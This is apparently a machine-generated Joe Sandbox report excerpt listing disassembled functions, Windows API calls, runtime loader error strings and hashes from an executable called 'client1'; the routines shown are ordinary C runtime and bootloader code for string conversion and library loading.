                                                    • Opcode ID: c48cb496368e60cd6cc9da65db67046a9100ebb4916df9b08028bbbb2119c3d9
                                                    • Instruction ID: 5127a553522058f030d11232e604bcacd8dff4058a98ad03220e3a6ef4e4d023
                                                    • Opcode Fuzzy Hash: c48cb496368e60cd6cc9da65db67046a9100ebb4916df9b08028bbbb2119c3d9
                                                    • Instruction Fuzzy Hash: 76416121B0D7C281EE34FB25E8402E9E3AAFB44794FD44431DE6D87A55EE3CE5418311
                                                    Function 00007FF79F62DC30 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                    • Instruction ID: d469534b6d766c56f50ee888696afe158bf8c955f0a15cc318a51780828034a7
                                                    • Opcode Fuzzy Hash: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                    • Instruction Fuzzy Hash: 5BE1B372A0878186EB30AF35D8402EDB7A9FB54798F900535EE9D87B95CF38E091C752
                                                    Function 00007FF79F63DDB8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,00000000,?,00007FF79F63E152,?,?,00000262AABC6A48,00007FF79F63A223,?,?,?,00007FF79F63A11A,?,?,?,00007FF79F635472), ref: 00007FF79F63DF34
                                                    • GetProcAddress.KERNEL32(?,00000000,?,00007FF79F63E152,?,?,00000262AABC6A48,00007FF79F63A223,?,?,?,00007FF79F63A11A,?,?,?,00007FF79F635472), ref: 00007FF79F63DF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                    • Instruction ID: c546f838c425362f3399e95c05d1f801b7d962b554382e889ded803afc47e86f
                                                    • Opcode Fuzzy Hash: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                    • Instruction Fuzzy Hash: AF412321B19B9681FA32BB32AC005F5A69BBF14BA0F894235DD2D47788DE7CF405C220
                                                    Function 00007FF79F627600 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F62769F
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F6276EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    • API String ID: 626452242-27947307
                                                    • Opcode ID: ff563fd808d69f35f83569dbbc19b7f1e21c5d08308d418d8919d0e7ff1619ab
                                                    • Instruction ID: 33d6bd8a595d56ce9ed342310b45cadffa52998b593ac2e599da2ee738bada72
                                                    • Opcode Fuzzy Hash: ff563fd808d69f35f83569dbbc19b7f1e21c5d08308d418d8919d0e7ff1619ab
                                                    • Instruction Fuzzy Hash: BB414F32A08BC286DA30EF25B8405EAE7AAFB84790F944135DEAD87B95DF7CD451C710
                                                    Function 00007FF79F627B40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF79F623699), ref: 00007FF79F627B81
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF79F623699), ref: 00007FF79F627BF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    • API String ID: 3723044601-27947307
                                                    • Opcode ID: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                    • Instruction ID: 1e8ce1385f1be308a713286a7656a1a1fe8cec77417bdd035004f334b6dd1b24
                                                    • Opcode Fuzzy Hash: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                    • Instruction Fuzzy Hash: 0D215E71B08B8285EB20BF35AC400F9B66ABB84B90F944535DA6D83754EF7CE5518321
                                                    Function 00007FF79F639264 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: f$p$p
                                                    • API String ID: 3215553584-1995029353
                                                    • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                    • Instruction ID: ed817100ff1da9d17aa66b1a47bd593b9df385f9632904351ed2d35c52c4c5df
                                                    • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                    • Instruction Fuzzy Hash: 3C127261E0D3D346FB347A35D0542FAF6ABEB82754FC84035D6A9466C8DABCE5809F20
                                                    Function 00007FF79F627C30 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                    • API String ID: 626452242-876015163
                                                    • Opcode ID: 290b57ca8453ae885af3ff2fc0035437ec55c1325ab119fe22c2f927501d8716
                                                    • Instruction ID: 55a2a91df314643ba3e8a6174a936a3bd340f2ea85152a7226c0593ebf60e84f
                                                    • Opcode Fuzzy Hash: 290b57ca8453ae885af3ff2fc0035437ec55c1325ab119fe22c2f927501d8716
                                                    • Instruction Fuzzy Hash: 12416232A08B8286E630FF35A8405F9E7AAFB44790F945235DA6D87BA4DF3CD452C711
                                                    Function 00007FF79F62CEE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CF6D
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CF7B
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFA5
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFEB
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF79F62D19A,?,?,?,00007FF79F62CE8C,?,?,00000001,00007FF79F62CAA9), ref: 00007FF79F62CFF7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                    • Instruction ID: d7c5080cdd8f26468dbd7bdde6db1f1dbefc9b6bdc914f9bdde3b44db8140bda
                                                    • Opcode Fuzzy Hash: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                    • Instruction Fuzzy Hash: E131A121A1A78291FE71BF22AC005F5A2AAFF08BB4F994535DD2D87390DF3CE5458721
                                                    Function 00007FF79F626480 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF79F627A30: MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF79F6267CF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF79F6264DF
                                                      • Part of subcall function 00007FF79F622770: MessageBoxW.USER32 ref: 00007FF79F622841
                                                    Strings
                                                    • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF79F6264F3
                                                    • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF79F62653A
                                                    • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF79F6264B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                    • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                    • API String ID: 1662231829-3498232454
                                                    • Opcode ID: e82e75a9301f2c01be817318613aadd6cb56ce3046e43f6970fb0f78f3b425c1
                                                    • Instruction ID: 10210cae02a5da7580aa32472d1a66e78c26cbe670e770a5c560e5b427f1dcde
                                                    • Opcode Fuzzy Hash: e82e75a9301f2c01be817318613aadd6cb56ce3046e43f6970fb0f78f3b425c1
                                                    • Instruction Fuzzy Hash: 9E315E11B187C240FA30BB31E9552FAD25AAF98784FC40431DA6E96BDAEE2DE5048721
                                                    Function 00007FF79F627A30 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • MultiByteToWideChar.KERNEL32 ref: 00007FF79F627AF0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                    • API String ID: 3723044601-876015163
                                                    • Opcode ID: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                    • Instruction ID: 9f2e00563ab7892172867902b63dd349e0876b4b8af7bc4b5835a1d096cd09be
                                                    • Opcode Fuzzy Hash: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                    • Instruction Fuzzy Hash: 77214422B08B8281EB60FB35F8400E9E366FF85794F944531DB6C93BA9EF2DD5418710
                                                    Function 00007FF79F63A620 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A62F
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A644
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A665
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A692
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6A3
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6B4
                                                    • SetLastError.KERNEL32(?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F,?,?,?,00007FF79F639313), ref: 00007FF79F63A6CF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
                                                    • Instruction ID: 7d43b17c794f12c4ac64cc17aac40b9b2e6bd3271b368f03124712aa789b55af
                                                    • Opcode Fuzzy Hash: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
                                                    • Instruction Fuzzy Hash: 8E213824E0C7D242FA78B73156511FAE24B5F56BB0F840734E83E07AD6DEADB400A630
                                                    Function 00007FF79F64706C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                    • Instruction ID: 810f57fa96b3e569063fe0804fcb4f4afbcab54fabd34b9d9e30289ec406c851
                                                    • Opcode Fuzzy Hash: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                    • Instruction Fuzzy Hash: D9118421718B8286F760BB22E854369B7AAFB58FE4F840234D96D87794CF3CD404C750
                                                    Function 00007FF79F63A798 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A7A7
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A7DD
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A80A
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A81B
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A82C
                                                    • SetLastError.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A847
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
                                                    • Instruction ID: 54e04fc50cd6634a31d28a0e04e6114a808eb9d4249d7a0ded5da86cd2ab78ff
                                                    • Opcode Fuzzy Hash: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
                                                    • Instruction Fuzzy Hash: 9E113B28E0D3C242FA747B315A811FAE25B5F55BB0F844734D83E17AD6DEADB402A630
                                                    Function 00007FF79F62C8A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                    • Instruction ID: 8982f06502d7dfab5b13709e126607f1b10cb27aac9b01bbc65d27bf8337a259
                                                    • Opcode Fuzzy Hash: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                    • Instruction Fuzzy Hash: C251C932B0578286D724EB35E8046E9B77AFB44BA4F908130DE6A87789DF38E941C751
                                                    Function 00007FF79F622240 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                    • String ID: Unhandled exception in script
                                                    • API String ID: 3081866767-2699770090
                                                    • Opcode ID: 01a0bb9e98a22bc39d92f1d9306349b6b95e7735addeeef39cbdf51254e5f23a
                                                    • Instruction ID: 75cbf9dd7fa8ae9d9d2df12f7b1f021d5dba8617397ec20490fe5290584012cd
